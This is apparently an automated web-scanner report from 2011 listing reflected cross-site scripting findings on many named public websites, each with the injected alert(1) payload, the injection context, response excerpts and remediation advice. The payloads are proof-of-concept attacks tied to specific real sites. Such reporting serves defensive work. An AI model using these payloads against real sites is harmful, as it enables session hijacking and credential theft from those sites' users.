Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; &quot; &#x27; &#x3D; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7e6"-alert(1)-"cb2ddf1c526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.icofc7e6"-alert(1)-"cb2ddf1c526"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb4c9'-alert(1)-'fcf1ddfae63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617ce"><script>alert(1)</script>5721ca53270 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9ff1<script>alert(1)</script>2128e304c54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4666b"><script>alert(1)</script>4f3eee2b900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39150'><script>alert(1)</script>bb8f65a6a8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e5d"><a>a582c202136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6db6<script>alert(1)</script>76020ab0f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 95434%20style%3dx%3aexpression(alert(1))%206530d067f4a was submitted in the REST URL parameter 1. This input was echoed as 95434 style=x:expression(alert(1)) 6530d067f4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24317"><script>alert(1)</script>121a4b3f1d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e862--><script>alert(1)</script>d9a6c1b138b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71013"><script>alert(1)</script>5a152d520dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b2e2"><script>alert(1)</script>5d9dc54262b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:19:14 GMT
Server:
Set-Cookie: session_id=ad88f0a6310c49a4fed5c4f4ab60d3e9; path=/; domain=.bleepingcomputer.com; httponly
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24835
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Bleeping Computer - Computer Help and Discussion</title> <meta name="Description" content="A free web based commun ...[SNIP]... <form action="http://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&do=process&return=http://www.bleepingcomputer.com/favicon.ico5b2e2"><script>alert(1)</script>5d9dc54262b" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f32fc'><script>alert(1)</script>bba725bdb52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:19:14 GMT
Server:
Set-Cookie: session_id=7a5bbe88b5e7a2147978182e0a1c3ec1; path=/; domain=.bleepingcomputer.com; httponly
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24835
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Bleeping Computer - Computer Help and Discussion</title> <meta name="Description" content="A free web based commun ...[SNIP]... <a href='http://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&return=http://www.bleepingcomputer.com/favicon.icof32fc'><script>alert(1)</script>bba725bdb52'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e65"><script>alert(1)</script>620768afb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a4b9'-alert(1)-'d0f76f80b1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7d1"><script>alert(1)</script>0f5d76ea955 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:27:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38532
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload b16ef</title><script>alert(1)</script>7bedde40a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48aa3<script>alert(1)</script>bead1ad8bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f27'%3balert(1)//896becadf55 was submitted in the REST URL parameter 1. This input was echoed as 39f27';alert(1)//896becadf55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27992<script>alert(1)</script>3ee2a973ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:04:04 GMT
Server: Apache
Content-Length: 2486
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 - Page Not Found</title> <style type="text/css"> body { background-color: #F2EFE8; font-family: verdana, sans-serif ...[SNIP]... <strong>http://www.calorie-count.com/favicon.ico27992<script>alert(1)</script>3ee2a973ae2</strong> ...[SNIP]...
1.22. http://www.calorie-count.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.calorie-count.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 723b2<script>alert(1)</script>9675ca470f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:04:04 GMT
Server: Apache
Content-Length: 2489
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 - Page Not Found</title> <style type="text/css"> body { background-color: #F2EFE8; font-family: verdana, sans-serif ...[SNIP]... <strong>http://www.calorie-count.com/favicon.ico?723b2<script>alert(1)</script>9675ca470f6=1</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1900"><script>alert(1)</script>2b16e35a3d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:24:11 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Thu, 31 Mar 2011 20:24:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>The Page You Requested Was N ...[SNIP]... <a href="/favicon.icoa1900"><script>alert(1)</script>2b16e35a3d2/es"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7166d<script>alert(1)</script>6e81a71c694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 770aa<script>alert(1)</script>5b41d12322e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2467"><script>alert(1)</script>d749514c894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1890"><a>449e9cf15fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a568d<script>alert(1)</script>6602233ab9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a53bb'-alert(1)-'6c32132cf1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 52dde--><a>6f9f1e27a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Thu, 31 Mar 2011 21:05:09 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56219
Date: Thu, 31 Mar 2011 21:00:10 GMT
X-Varnish: 1145605573
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy2v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 02-23-11, 18:23:08 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico52dde--><a>6f9f1e27a7d --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79676"-alert(1)-"1eb60a3090f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72686"><a>058f96401a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 829b3<a>3c43004e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c349'-alert(1)-'7f4d161b00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f73f<a>07b3868c9eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Thu, 31 Mar 2011 21:24:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 20:24:53 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=94e5b3b9ef0dc69878440525a651c731; expires=Sun, 28 Mar 2021 20:24:53 GMT; path=/; domain=.domaintools.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html> <head> <title>DomainTools: Page Not Found</title> <link rel="alternate" type="application/ ...[SNIP]... <a>07b3868c9eb">Whois record for "9f73f<a>07b3868c9eb"</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539a1"-alert(1)-"e7f74d1630a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeee8<script>alert(1)</script>c6239eb935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06a3"><script>alert(1)</script>1184b6c85af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.icob06a3"><script>alert(1)</script>1184b6c85af at Thu Mar 31 17:04:24 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb61f<script>alert(1)</script>d290fbfbec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/favicon.icofb61f<script>alert(1)</script>d290fbfbec1 at Thu Mar 31 17:04:24 2011 from 173.193.214.243<br> ...[SNIP]...
1.40. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ecnext.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6be0<script>alert(1)</script>eda0e6a2db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/favicon.ico?f6be0<script>alert(1)</script>eda0e6a2db0=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243<br> ...[SNIP]...
1.41. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ecnext.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52049"><script>alert(1)</script>dba38377c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.ico?52049"><script>alert(1)</script>dba38377c16=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ef7"%3b39b7c30645e was submitted in the REST URL parameter 1. This input was echoed as 68ef7";39b7c30645e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ad0"><a>00913a37cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58588<script>alert(1)</script>fbf14ed29b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:23:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <p>The page you are looking for: "http://www.egotastic.com/favicon.ico58588<script>alert(1)</script>fbf14ed29b2" seems to be missing.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e21c8<script>alert(1)</script>31495f85061 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 800fa<script>alert(1)</script>f2eb3a906fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body { fo ...[SNIP]... <h1>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 33f72</title><script>alert(1)</script>7bc3345a70f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico33f72</title><script>alert(1)</script>7bc3345a70f not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body { ...[SNIP]...
1.48. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.elyricsworld.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 3fe68</title><script>alert(1)</script>a78f99571dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico?3fe68</title><script>alert(1)</script>a78f99571dc=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body ...[SNIP]...
1.49. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.elyricsworld.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14dd9<script>alert(1)</script>3e7d9a90ad9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c96'%3b233a586cfa8 was submitted in the REST URL parameter 1. This input was echoed as 55c96';233a586cfa8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4ee9"><script>alert(1)</script>2114a57d217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da652"%3bbc4ae8cb999 was submitted in the REST URL parameter 1. This input was echoed as da652";bc4ae8cb999 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b3"><script>alert(1)</script>a747a8ea890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b92"-alert(1)-"8460d23bac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
